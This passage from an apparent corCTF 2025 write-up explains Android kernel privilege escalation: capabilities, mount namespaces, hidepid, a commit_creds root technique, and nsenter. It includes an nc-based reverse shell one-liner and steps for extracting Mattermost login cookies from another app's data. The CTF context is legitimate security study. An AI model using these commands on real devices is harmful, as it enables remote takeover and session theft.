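<p>From userspace, the effect of this patch can be observed by simply asking for UID 0. The following is a minimal sketch and is not taken from the exploit; the helper name <code class="language-plaintext highlighter-rouge">try_become_root()</code> is hypothetical. On an unpatched kernel, a caller without <code class="language-plaintext highlighter-rouge">CAP_SETUID</code> that requests a UID it does not already hold gets <code class="language-plaintext highlighter-rouge">EPERM</code>; once the check is bypassed, the same call is expected to succeed.</p>

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* glibc only declares setresuid() with this defined */
#endif
#include <errno.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: ask the kernel to set the real, effective and saved
 * UID to 0. Returns 0 on success or the errno value on failure. */
static int try_become_root(void)
{
    if (setresuid(0, 0, 0) != 0)
        return errno;
    return 0;
}
```

<p>A return value of <code class="language-plaintext highlighter-rouge">0</code> only means the UIDs changed; it says nothing about capabilities.</p>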

<p>However, the root user <strong>does not gain full control over resources</strong> because it has <strong>no capabilities</strong>. For example, even the <code class="language-plaintext highlighter-rouge">/tmp</code> directory owned by the <code class="language-plaintext highlighter-rouge">shell</code> user cannot be accessed:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # cat /proc/$$/status | grep Cap
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000000000000000
CapAmb: 0000000000000000

:/ # ls -al /tmp
ls: /tmp: Permission denied
</code></pre></div></div>
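
<p>The same check can be done programmatically. The sketch below parses the capability masks out of the text of <code class="language-plaintext highlighter-rouge">/proc/self/status</code>; the helper names <code class="language-plaintext highlighter-rouge">parse_cap_field()</code> and <code class="language-plaintext highlighter-rouge">read_own_cap_eff()</code> are hypothetical and not part of the exploit.</p>

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: find "<field>:" at the start of a line in the text of
 * /proc/<pid>/status and parse the hexadecimal mask that follows.
 * Returns 0 on success, -1 if the field is missing. */
static int parse_cap_field(const char *status, const char *field,
                           unsigned long long *mask)
{
    size_t flen = strlen(field);
    const char *line = status;

    while (line && *line) {
        if (strncmp(line, field, flen) == 0 && line[flen] == ':') {
            /* strtoull() skips the tab that separates name and value */
            *mask = strtoull(line + flen + 1, NULL, 16);
            return 0;
        }
        line = strchr(line, '\n');
        if (line)
            line++; /* step past the newline to the next line */
    }
    return -1;
}

/* Read /proc/self/status and report the effective capability mask. */
static int read_own_cap_eff(unsigned long long *mask)
{
    char buf[8192];
    FILE *fp = fopen("/proc/self/status", "r");
    size_t n;

    if (!fp)
        return -1;
    n = fread(buf, 1, sizeof(buf) - 1, fp);
    fclose(fp);
    buf[n] = '\0';
    return parse_cap_field(buf, "CapEff", mask);
}
```

<p>A mask of zero for <code class="language-plaintext highlighter-rouge">CapEff</code>, as in the output above, means the process holds no effective capabilities regardless of its UID.</p>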

<p>Moreover, due to the <strong>mount namespace</strong>, a shell spawned by an untrusted application can only access a limited view of the filesystem. This can be verified by comparing the namespaces of the init process (PID 1) and the reverse shell process (PID 2525):</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span>adb shell su 0 <span class="nb">ls</span> <span class="nt">-al</span> /proc/2525/ns/
total 0
dr-x--x--x 2 root u0_a116 0 2025-09-08 06:19 <span class="nb">.</span>
dr-xr-xr-x 9 root u0_a116 0 2025-09-08 04:45 ..
lrwxrwxrwx 1 root u0_a116 0 2025-09-08 06:19 cgroup -&gt; cgroup:[4026531835]
lrwxrwxrwx 1 root u0_a116 0 2025-09-08 06:19 mnt -&gt; mnt:[4026533945] <span class="c"># &lt;------------------</span>
lrwxrwxrwx 1 root u0_a116 0 2025-09-08 06:19 net -&gt; net:[4026531840]
lrwxrwxrwx 1 root u0_a116 0 2025-09-08 06:19 uts -&gt; uts:[4026531838]

aaa@aaa:~<span class="nv">$ </span>adb shell su 0 <span class="nb">ls</span> <span class="nt">-al</span> /proc/1/ns/
total 0
dr-x--x--x 2 root root 0 2025-09-08 04:44 <span class="nb">.</span>
dr-xr-xr-x 9 root root 0 2025-09-08 04:44 ..
lrwxrwxrwx 1 root root 0 2025-09-08 06:20 cgroup -&gt; cgroup:[4026531835]
lrwxrwxrwx 1 root root 0 2025-09-08 04:44 mnt -&gt; mnt:[4026533086] <span class="c"># &lt;------------------</span>
lrwxrwxrwx 1 root root 0 2025-09-08 06:20 net -&gt; net:[4026531840]
lrwxrwxrwx 1 root root 0 2025-09-08 06:20 uts -&gt; uts:[4026531838]
</code></pre></div></div>
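
<p>The comparison above can also be scripted. As a rough sketch (the helper names are hypothetical), the following reads the <code class="language-plaintext highlighter-rouge">ns/mnt</code> link of two processes and compares the inode numbers inside the brackets; two processes share a mount namespace only when those numbers match.</p>

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: extract the inode number from a namespace link target
 * such as "mnt:[4026533945]". Returns 0 if the text is not in that form. */
static unsigned long ns_inode_from_link(const char *target)
{
    unsigned long inode = 0;
    const char *bracket = strchr(target, '[');

    if (!bracket || sscanf(bracket, "[%lu]", &inode) != 1)
        return 0;
    return inode;
}

/* Hypothetical helper: read /proc/<pid>/ns/mnt and return its inode number,
 * or 0 if the link cannot be read (for example, because access is denied). */
static unsigned long mnt_ns_inode(pid_t pid)
{
    char path[64];
    char target[128];
    ssize_t len;

    snprintf(path, sizeof(path), "/proc/%d/ns/mnt", (int)pid);
    len = readlink(path, target, sizeof(target) - 1);
    if (len < 0)
        return 0;
    target[len] = '\0';
    return ns_inode_from_link(target);
}

/* Returns 1 when both links are readable and name the same namespace. */
static int same_mnt_ns(pid_t a, pid_t b)
{
    unsigned long ia = mnt_ns_inode(a), ib = mnt_ns_inode(b);

    return ia != 0 && ia == ib;
}
```

<p>With the values shown above, <code class="language-plaintext highlighter-rouge">same_mnt_ns(1, 2525)</code> would return 0, since 4026533086 and 4026533945 differ.</p>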

<p>In addition, <code class="language-plaintext highlighter-rouge">/proc</code> is mounted with the option <code class="language-plaintext highlighter-rouge">hidepid=invisible</code>. This option hides processes owned by other UIDs, further isolating the environment. Only processes that belong to group 3009 (<code class="language-plaintext highlighter-rouge">AID_READPROC</code>) are allowed to view the entire <code class="language-plaintext highlighter-rouge">/proc/</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ $ mount | grep hide
proc on /proc type proc (rw,relatime,gid=3009,hidepid=invisible)
</code></pre></div></div>

<p>This check is performed by the function <code class="language-plaintext highlighter-rouge">proc_pid_readdir()</code> when listing <code class="language-plaintext highlighter-rouge">/proc</code> entries. If <code class="language-plaintext highlighter-rouge">has_pid_permissions()</code> returns false, the corresponding process entry will be skipped [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">proc_pid_readdir</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="k">struct</span> <span class="n">dir_context</span> <span class="o">*</span><span class="n">ctx</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">iter</span> <span class="o">=</span> <span class="n">next_tgid</span><span class="p">(</span><span class="n">ns</span><span class="p">,</span> <span class="n">iter</span><span class="p">);</span>
         <span class="n">iter</span><span class="p">.</span><span class="n">task</span><span class="p">;</span>
         <span class="n">iter</span><span class="p">.</span><span class="n">tgid</span> <span class="o">+=</span> <span class="mi">1</span><span class="p">,</span> <span class="n">iter</span> <span class="o">=</span> <span class="n">next_tgid</span><span class="p">(</span><span class="n">ns</span><span class="p">,</span> <span class="n">iter</span><span class="p">))</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">10</span> <span class="o">+</span> <span class="mi">1</span><span class="p">];</span>
        <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>

        <span class="n">cond_resched</span><span class="p">();</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">has_pid_permissions</span><span class="p">(</span><span class="n">fs_info</span><span class="p">,</span> <span class="n">iter</span><span class="p">.</span><span class="n">task</span><span class="p">,</span> <span class="n">HIDEPID_INVISIBLE</span><span class="p">))</span> <span class="c1">// [1]</span>
            <span class="k">continue</span><span class="p">;</span>

        <span class="c1">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">has_pid_permissions()</code> function first checks whether the hidepid level of the mount is lower than the required threshold [2], which in this case is <code class="language-plaintext highlighter-rouge">HIDEPID_INVISIBLE</code>; if so, the entry is visible. It then checks whether the current process belongs to group 3009 [3], which also grants access. Finally, it performs <strong>a ptrace access check against the target process</strong> [4] and returns true only if that check succeeds.</p>

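<p>This is why a process with UID 0 may still be unable to read information about other UID 0 processes from <code class="language-plaintext highlighter-rouge">/proc</code>: without membership in group 3009, visibility falls back to the ptrace access check, which considers more than the UID (for example, GIDs, capabilities, and the LSM policy).</p>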

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">bool</span> <span class="nf">has_pid_permissions</span><span class="p">(</span><span class="k">struct</span> <span class="n">proc_fs_info</span> <span class="o">*</span><span class="n">fs_info</span><span class="p">,</span>
                 <span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span>
                 <span class="k">enum</span> <span class="n">proc_hidepid</span> <span class="n">hide_pid_min</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fs_info</span><span class="o">-&gt;</span><span class="n">hide_pid</span> <span class="o">==</span> <span class="n">HIDEPID_NOT_PTRACEABLE</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">ptrace_may_access</span><span class="p">(</span><span class="n">task</span><span class="p">,</span> <span class="n">PTRACE_MODE_READ_FSCREDS</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">fs_info</span><span class="o">-&gt;</span><span class="n">hide_pid</span> <span class="o">&lt;</span> <span class="n">hide_pid_min</span><span class="p">)</span> <span class="c1">// [2]</span>
        <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">in_group_p</span><span class="p">(</span><span class="n">fs_info</span><span class="o">-&gt;</span><span class="n">pid_gid</span><span class="p">))</span> <span class="c1">// [3]</span>
        <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">ptrace_may_access</span><span class="p">(</span><span class="n">task</span><span class="p">,</span> <span class="n">PTRACE_MODE_READ_FSCREDS</span><span class="p">);</span> <span class="c1">// [4]</span>
<span class="p">}</span>
</code></pre></div></div>
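
<p>To make the decision order easier to follow, here is a small userspace model of the function above. It is only a sketch: <code class="language-plaintext highlighter-rouge">struct caller_model</code> and <code class="language-plaintext highlighter-rouge">model_has_pid_permissions()</code> are hypothetical names, and the two booleans stand in for the results of <code class="language-plaintext highlighter-rouge">in_group_p()</code> and <code class="language-plaintext highlighter-rouge">ptrace_may_access()</code>.</p>

```c
#include <stdbool.h>

/* Values mirror the kernel's enum proc_hidepid. */
enum hidepid_level {
    HIDEPID_OFF = 0,
    HIDEPID_NO_ACCESS = 1,
    HIDEPID_INVISIBLE = 2,
    HIDEPID_NOT_PTRACEABLE = 4,
};

/* Hypothetical stand-in for the facts the kernel checks about the caller. */
struct caller_model {
    bool in_pid_gid;     /* is the caller in the gid= group (3009 here)? */
    bool ptrace_allowed; /* would ptrace_may_access() on the target succeed? */
};

/* Userspace model of has_pid_permissions(); not kernel code. */
static bool model_has_pid_permissions(enum hidepid_level mount_level,
                                      enum hidepid_level hide_pid_min,
                                      struct caller_model caller)
{
    if (mount_level == HIDEPID_NOT_PTRACEABLE)
        return caller.ptrace_allowed;
    if (mount_level < hide_pid_min) /* [2] */
        return true;
    if (caller.in_pid_gid)          /* [3] */
        return true;
    return caller.ptrace_allowed;   /* [4] */
}
```

<p>In this model, a caller with <code class="language-plaintext highlighter-rouge">{ false, false }</code> on a <code class="language-plaintext highlighter-rouge">hidepid=invisible</code> mount gets <code class="language-plaintext highlighter-rouge">false</code>, which corresponds to the capability-less UID 0 shell described above.</p>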

<p>Additionally, although not directly related to privilege escalation, Android applies certain <strong>seccomp rules</strong> to untrusted applications, which means some syscalls are not allowed.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span>adb shell <span class="nb">cat</span> /proc/2525/status | <span class="nb">grep </span>Seccomp
Seccomp:                2
Seccomp_filters:        1
</code></pre></div></div>

<p>You can find the actual restricted syscalls in the <a href="https://android.googlesource.com/platform/bionic/+/refs/heads/main/libc/">bionic source code</a>. The final seccomp allowlist is derived as: <code class="language-plaintext highlighter-rouge">SYSCALLS.TXT</code> - <code class="language-plaintext highlighter-rouge">SECCOMP_BLOCKLIST.TXT</code> + <code class="language-plaintext highlighter-rouge">SECCOMP_ALLOWLIST.TXT</code>.</p>
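
<p>The derivation is plain set arithmetic. The sketch below applies it to arrays of syscall names; the function names are hypothetical, and any names passed in are illustrative only and do not reflect the actual contents of the bionic files.</p>

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 if name appears in the first n entries of set. */
static int contains(const char *const *set, size_t n, const char *name)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(set[i], name) == 0)
            return 1;
    return 0;
}

/* Compute (syscalls - blocklist) + allowlist into out and return the count.
 * out must have room for n_sys + n_allow entries. */
static size_t build_allowlist(const char *const *syscalls, size_t n_sys,
                              const char *const *blocklist, size_t n_block,
                              const char *const *allowlist, size_t n_allow,
                              const char **out)
{
    size_t n_out = 0;

    /* Start from every known syscall that is not explicitly blocked. */
    for (size_t i = 0; i < n_sys; i++)
        if (!contains(blocklist, n_block, syscalls[i]))
            out[n_out++] = syscalls[i];

    /* Then add the explicitly allowed ones, skipping duplicates. */
    for (size_t i = 0; i < n_allow; i++)
        if (!contains(out, n_out, allowlist[i]))
            out[n_out++] = allowlist[i];

    return n_out;
}
```

<p>Because the allowlist is applied last, an entry listed there is permitted even if it is absent from the base syscall list.</p>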

<h4 id="364-bypass-them-and-get-root">3.6.4. Bypass Them and Get Root</h4>

<p>The capabilities are stored in <code class="language-plaintext highlighter-rouge">struct cred</code>, along with the UID and GID, so replacing the whole credential set fixes all of them at once. Therefore, injecting shellcode that calls <strong><code class="language-plaintext highlighter-rouge">commit_creds(prepare_kernel_cred(NULL))</code></strong> to reuse the cred of <code class="language-plaintext highlighter-rouge">&amp;init_task</code> is sufficient.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">cred</span> <span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">kuid_t</span> <span class="n">uid</span><span class="p">;</span>        <span class="cm">/* real UID of the task */</span>
    <span class="n">kgid_t</span> <span class="n">gid</span><span class="p">;</span>        <span class="cm">/* real GID of the task */</span>
    <span class="c1">// [...]</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_inheritable</span><span class="p">;</span>  <span class="cm">/* caps our children can inherit */</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_permitted</span><span class="p">;</span>    <span class="cm">/* caps we're permitted */</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_effective</span><span class="p">;</span>    <span class="cm">/* caps we can actually use */</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_bset</span><span class="p">;</span>         <span class="cm">/* capability bounding set */</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_ambient</span><span class="p">;</span>      <span class="cm">/* Ambient capability set */</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
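
<p>The difference between the two approaches can be illustrated with a toy userspace model. This is not kernel code: <code class="language-plaintext highlighter-rouge">struct cred_model</code>, <code class="language-plaintext highlighter-rouge">struct task_model</code>, and both functions are hypothetical, and the fields are a reduced subset of the real structure.</p>

```c
#include <stdint.h>

/* Userspace model only: a reduced stand-in for the kernel's struct cred. */
struct cred_model {
    unsigned int uid;
    unsigned int gid;
    uint64_t cap_permitted;
    uint64_t cap_effective;
    uint64_t cap_bset;
};

struct task_model {
    struct cred_model cred;
};

/* Models the result of the one-byte setresuid() patch: only the UID changes,
 * so the GID and the (empty) capability sets stay as they were. */
static void model_setresuid_root(struct task_model *task)
{
    task->cred.uid = 0;
}

/* Models commit_creds(prepare_kernel_cred(...)): the whole credential set
 * is replaced by a copy of init's, including GID and capabilities. */
static void model_commit_init_creds(struct task_model *task,
                                    const struct cred_model *init_cred)
{
    task->cred = *init_cred;
}
```

<p>In the model, the first function leaves <code class="language-plaintext highlighter-rouge">cap_effective</code> at zero, while the second copies whatever mask the init credentials carry.</p>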

<p>After this, we gain <strong>full root privileges</strong>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
</code></pre></div></div>

<p>At this point, the entire <code class="language-plaintext highlighter-rouge">/proc</code> can be listed:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
:/ # ls -al /proc/
total 4
dr-xr-xr-x 477 root           root               0 2025-09-08 07:48 .
drwxr-xr-x  27 root           root             683 2009-01-01 00:00 ..
dr-xr-xr-x   9 root           root               0 2025-09-08 07:48 1
dr-xr-xr-x   9 root           root               0 2025-09-08 07:48 100
dr-xr-xr-x   9 root           root               0 2025-09-08 07:48 101
dr-xr-xr-x   9 root           root               0 2025-09-08 07:48 102
[...]
</code></pre></div></div>

<p>However, because we are still in a different mount namespace, the private data of other applications remains inaccessible:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # ls -al /data/data/
total 11
drwxr-x--x  3 root    root      60 2025-09-08 07:48 .
drwxrwx--x 52 system  system  4096 2025-09-08 07:48 ..
drwx------  5 u0_a116 u0_a116 3452 2025-09-08 04:34 com.example.notabackdoor2
</code></pre></div></div>

<p>By executing <code class="language-plaintext highlighter-rouge">nsenter -t 1 -m sh</code>, we can spawn a new shell <strong>inside the mount namespace of the init process</strong>. From there, it becomes possible to view the entire <code class="language-plaintext highlighter-rouge">/data/data</code> directory:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # nsenter -t 1 -m sh
ls -al /data/data | head -n 10
total 462
drwxrwx--x 148 system         system         20480 2025-09-08 04:32 .
drwxrwx--x  52 system         system          4096 2025-09-08 07:48 ..
drwx------   4 system         system          3452 2025-09-08 04:31 android
drwx------   4 u0_a18         u0_a18          3452 2025-09-08 04:31 android.cuttlefish.overlay
drwx------   4 u0_a17         u0_a17          3452 2025-09-08 04:31 android.cuttlefish.phone.overlay
drwx------   4 u0_a112        u0_a112         3452 2025-09-08 04:31 android.ext.services
drwx------   4 u0_a46         u0_a46          3452 2025-09-08 04:31 android.ext.shared
drwx------   4 system         system          3452 2025-09-08 04:31 com.android.DeviceAsWebcam
drwx------   4 u0_a99         u0_a99          3452 2025-09-08 04:31 com.android.adservices.api
</code></pre></div></div>
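
<p>If <code class="language-plaintext highlighter-rouge">nsenter</code> is not available, the same step can be sketched directly with the <code class="language-plaintext highlighter-rouge">setns()</code> system call. The helper names below are hypothetical, and this is only an approximation of what <code class="language-plaintext highlighter-rouge">nsenter -t 1 -m</code> does before it executes the shell.</p>

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* for setns() and CLONE_NEWNS */
#endif
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: build "/proc/<pid>/ns/mnt" into buf.
 * Returns 0 on success, -1 if buf is too small. */
static int mnt_ns_path(pid_t pid, char *buf, size_t len)
{
    int n = snprintf(buf, len, "/proc/%d/ns/mnt", (int)pid);

    return (n > 0 && (size_t)n < len) ? 0 : -1;
}

/* Join the mount namespace of pid.
 * Returns 0 on success or an errno value on failure. */
static int enter_mnt_ns(pid_t pid)
{
    char path[64];
    int fd, rc = 0;

    if (mnt_ns_path(pid, path, sizeof(path)) != 0)
        return ENAMETOOLONG;
    fd = open(path, O_RDONLY | O_CLOEXEC);
    if (fd < 0)
        return errno;
    if (setns(fd, CLONE_NEWNS) != 0)
        rc = errno;
    close(fd);
    return rc;
}
```

<p>After <code class="language-plaintext highlighter-rouge">enter_mnt_ns(1)</code> returns 0, executing a shell from the same process would give it the filesystem view of the init process.</p>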

<h4 id="365-post-root">3.6.5. Post Root</h4>

<p>I used the following command to get a reverse shell - thanks to devil for the help with this part!</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkfifo</span> /sdcard/Download/bruh<span class="p">;</span><span class="nb">cat</span> /sdcard/Download/bruh|/system/bin/sh <span class="nt">-i</span> 2&gt;&amp;1|nc <span class="nv">$IP</span> <span class="nv">$PORT</span> <span class="o">&gt;</span>/sdcard/Download/bruh
</code></pre></div></div>

<p>After obtaining a root reverse shell, we followed the author’s hint and extracted the login cookies from <code class="language-plaintext highlighter-rouge">/data/data/com.mattermost.rn/app_webview/Default/Cookies</code>, which is a SQLite3 database. Inside, we found three cookies used to authenticate to a private Mattermost website:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sqlite&gt; SELECT * FROM cookies;
13401091427226867|rbtree.ctfi.ng||MMAUTHTOKEN|&lt;REDACTED&gt;||/&lt;REDACTED&gt;-secret-pigeon-club-&lt;REDACTED&gt;|13416643427000000|1|1|13401091427226867|1|1|1|-1|2|443|13401091427226948|3|1
13401091427227273|rbtree.ctfi.ng||MMCSRF|&lt;REDACTED&gt;||/&lt;REDACTED&gt;-secret-pigeon-club-&lt;REDACTED&gt;|13416643427000000|1|0|13401091427227273|1|1|1|-1|2|443|13401091427227282|3|1
13401091427227233|rbtree.ctfi.ng||MMUSERID|&lt;REDACTED&gt;||/&lt;REDACTED&gt;-secret-pigeon-club-&lt;REDACTED&gt;|13416643427000000|1|0|13401091427227233|1|1|1|-1|2|443|13401091427227248|3|1
</code></pre></div></div>

<p>After logging in with these cookies, the chat channel looks like this:</p>

<p><img src="/assets/image-20250908000000000.png" alt="image-20250908000000000" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p>Just scroll up in the chat, and you’ll find the pigeon’s secret :). 🕊️🕊️🕊️</p>

<p><img src="/assets/image-20250908000000001.png" alt="image-20250908000000001" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h2 id="4-epilogue--conclusion">4. Epilogue &amp; Conclusion</h2>

<p>In fact, after I patched <code class="language-plaintext highlighter-rouge">__sys_setresuid()</code> and failed to obtain full root, I got stuck and had no idea how to proceed. Billy, however, shared with me a private exploitation technique that also achieves full root without preparing kernel credentials, which is quite amazing! I’ll keep it a secret, since he doesn’t want it to be made public 🫢.</p>

<p>I believe there are still many potential methods to escalate to root. But without a solid understanding of Android’s mitigation mechanisms, one might end up relying on trial and error, which can be both time-consuming and frustrating when developing an exploit.</p>

<p>Anyway, I learned a lot about Android while working on this challenge and I’m happy that I managed to solve it before the CTF ended. I hope you can also learn something from this write-up. Thanks again to Billy (@st424204) and devil (d3vil)!</p>

<p>You can find the full exploit <a href="/assets/corctf-2025-corphone-exp.c">here</a>.</p>]]></content><author><name></name></author><category term="Android" /><summary type="html"><![CDATA[Last week, I participated in corCTF as part of team Billy (simply because my friend Billy (@st424204) was also playing it in his free time) and solved an Android pwn challenge, corphone. Although I had some prior research experience with Android, this was the first time I successfully achieved LPE on it!]]></summary></entry></feed>